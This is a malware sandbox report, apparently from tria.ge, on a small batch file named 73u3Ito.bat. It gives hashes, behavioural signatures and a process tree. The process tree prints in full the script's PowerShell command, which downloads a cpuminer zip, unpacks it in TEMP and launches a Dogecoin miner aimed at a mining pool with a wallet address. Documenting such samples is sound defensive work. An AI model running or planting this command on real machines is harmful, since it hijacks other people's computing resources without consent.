Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
1793s -
max time network
1798s -
platform
windows10-1703_x64 -
resource
win10-20231215-en -
resource tags
arch:x64arch:x86image:win10-20231215-enlocale:en-usos:windows10-1703-x64system -
submitted
03/02/2024, 03:05
Static task
static1
Behavioral task
behavioral1
Sample
73u3Ito.bat
Resource
win10-20231215-en
Behavioral task
behavioral2
Sample
73u3Ito.bat
Resource
win10v2004-20231215-en
General
-
Target
73u3Ito.bat
-
Size
499B
-
MD5
fe74bff27516829a88cfbc6f6e99646f
-
SHA1
0c15d859211c79910b277d07e729bec7197a60cd
-
SHA256
b1f312f139949cac20d0591831ce57c227c6ac77ebd98edfcdafa5c0b02cd2bb
-
SHA512
a94dbaef073e7b62ff9827887f1da6837103316c5656719b176ba1c2a063066f5f159b8ca783208db629121beea33fb81a94b9e6f4f4ec2612ee923639947a98
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 2 876 powershell.exe 4 876 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2244 cpuminer-sse2.exe -
Loads dropped DLL 5 IoCs
pid Process 2244 cpuminer-sse2.exe 2244 cpuminer-sse2.exe 2244 cpuminer-sse2.exe 2244 cpuminer-sse2.exe 2244 cpuminer-sse2.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 876 powershell.exe 876 powershell.exe 876 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 876 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 3572 wrote to memory of 876 3572 cmd.exe 25 PID 3572 wrote to memory of 876 3572 cmd.exe 25 PID 876 wrote to memory of 4780 876 powershell.exe 76 PID 876 wrote to memory of 4780 876 powershell.exe 76 PID 4780 wrote to memory of 2244 4780 cmd.exe 78 PID 4780 wrote to memory of 2244 4780 cmd.exe 78
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\73u3Ito.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:3572 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command "Invoke-WebRequest -Uri 'https://github.com/JayDDee/cpuminer-opt/releases/download/v23.15/cpuminer-opt-23.15-windows.zip' -OutFile "$env:TEMP\cpuminer.zip"; Expand-Archive -Path "$env:TEMP\cpuminer.zip" -DestinationPath "$env:TEMP\cpuminer"; Set-Location -Path "$env:TEMP\cpuminer"; Start-Process -FilePath 'cmd.exe' -ArgumentList '/k', 'cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 2'"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /k cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 23⤵
- Suspicious use of WriteProcessMemory
PID:4780 -
C:\Users\Admin\AppData\Local\Temp\cpuminer\cpuminer-sse2.execpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.na.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 24⤵
- Executes dropped EXE
- Loads dropped DLL
PID:2244
-
-
-
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
137KB
MD56e96a730da5746d4318f539acf94e98f
SHA1a6339f4bb37421ce5d81a52647345cad4a6958ff
SHA25699a3cddf77d39fd4a502fbfb120be46ab534d986eea15d592c266ae1872163cf
SHA5122c1fa69c79343069be9dbc21a5e7f20d82bdff676e8634a48ad8a88273c20fec25441864742376e547b38e32a0b5273675f5f8abb4dab2098c4703897c6e7b53
-
Filesize
74KB
MD50da308e8e07abe7afaa074553f4711e6
SHA13e890aa1e71ff8b5cc3a2d96dfab832a70b111ee
SHA256b21d8c98314c080f4b3742dd568cdd7cccf8d3a51015c4e21194a6897d9c6e12
SHA512236afece470aeae11928446ad523711ae81f9641e5868ffe9559e6a8828d6b16647c806c17fc6e23961d2525609240730ccf9b0a956e0a2844292be60ba4831d
-
Filesize
179KB
MD550a0a0815e137ad518e48c1134ebf298
SHA17c8ea7799751a0a6874fb7038f41ead01a9ebe1e
SHA256dc870d01d57c15bac0741fc55ee6b2d453274e79c839e13db15e361420143951
SHA512123fce715806ece380ac75ef5ab74675b4cb546c74b51212bf8b80de75dd9b9f8a022e2d163c6b44d10154d65abde4fd0f321f73335ade455bd1f5bc6c7d68a2
-
Filesize
207KB
MD5d08ebc6eb604a268578e779ea59f0ccb
SHA19dd7aa1462c2e2eee6879d8d37702f155d0521fe
SHA25635c46bf40ebdd7a39b219be2d889fdeeb567673e9d2bfc79dff5dc26853182fd
SHA5128a4706ecf9d133910058e69463cffd49387e850766475ca6d9e6c515db959a4aab343bfdc9ca6f6c86cd8fc5d184c737bb92469e394e96a93a5320caa8629302
-
Filesize
65KB
MD531c89c40fc5fafed8f0a578be7a0884a
SHA133b0f6fcefe6619a85474b11258947500c14eb83
SHA256cf005e094e9ec19b6d2c932fb25baa0717cdc4843dede40ce5c645ba018a5e85
SHA5125ef6e037e04c88f2e38c33e6666433718fcc351e8c2b7d8ee1c7110e34736aca2051e0df5f9ab49274745ef5d05da3290d4f6b9804d9ae2117a9c2bea32431d6
-
Filesize
83KB
MD5069b4ef51f8095c760a0f6b7bf4e5f98
SHA1f97c846b60cb92223f6a00c3ed014a77515b840e
SHA25650af103cc68cda07e9ba9314c0c3d92be447fb91a9f6621b332e89ed874ede5b
SHA5125db1ac8a3f5a30d29d660ecc7bada996476672b673a187597908bbb79ee669fca6abee4cfa573b12ecafa3a850c97f9585e4e410559fd20b4dce2ac5a8a10e52
-
Filesize
128KB
MD554770d334455129e53f7cf689b1705ff
SHA147afbba9f0a636406c329f5eb36864553eb7fa61
SHA256732bfd1b95877968e76035c83b70c5caebe448ea5bef017f9b45c1c806bd799e
SHA512d30026137f796a5c8e88e0af46db05aa62574ce30cbe55c4255a821639f50aef93177eec629bddd19cbf25099e3f0702db3de37102156c633e95ebd163910326
-
Filesize
153KB
MD5bba55a40abd55f190515effaf90afd9c
SHA156d1298d873b485285da5613db5ce9cd884c8b59
SHA25695275df0475ef63433e189b44d59b02eaae6ebdda019a3d4bd6fc206723cb57e
SHA512c27bff6968d6620262a48a058a3039dac7d812e6e99213edb3f01b194a12f44efbc8a557041481fdc359069f95e1e2614d6725bab8fc29be4db27f1fa4b50842
-
Filesize
97KB
MD5098f929c7ed35efa06d248d3d556a41a
SHA11e291b69d26ab58ee5f1c954a4e9a67dca321e1e
SHA256590b9437a8bfae9ced9ac3dfe9d6250593669d99c91e3c9ad3059b2602ec3761
SHA512837669dd8c449a4c38a69bb8c3ec335239208a1653a664d08ae3e5f65f76960cfcafc873db6a5feb1ff003bce3244d30f5f860b1b0e8358c692c857766e86d97
-
Filesize
78KB
MD55888f9be5a7e50a4bb0fa002e4449bae
SHA19d5a90db951736f5c588c18b33a48e1d59692b9a
SHA256b0fffa1954cb15e7137ffd985c9a569aac242c80b39220e660f63a2ae1a47634
SHA5128d83c9f97c14d4c456e21ecd77162a620f3e8b3992d2d6baf06445b6f9e3e0962c099f5123cbbdda0f933a7f11e89215d553ab578076f1fa3c9aed5e2f12e886
-
Filesize
157KB
MD535af484b9d0c2997b0fdb9c4c2e10ea7
SHA158ecab4267b78850cdb3e71385dfc941de3f5509
SHA256febcde7b8e9d151350c8782021b29f48b5021a19ba43613a3bf9dd6c940e1f86
SHA51265718da6b132eb6d42aa8920d1a1153a8e5f94b3006840eec711404b20c8dc6bf79132e879eef4202571fb71ca1b1291d3689bde42a1e3bca6b86cb607ae6227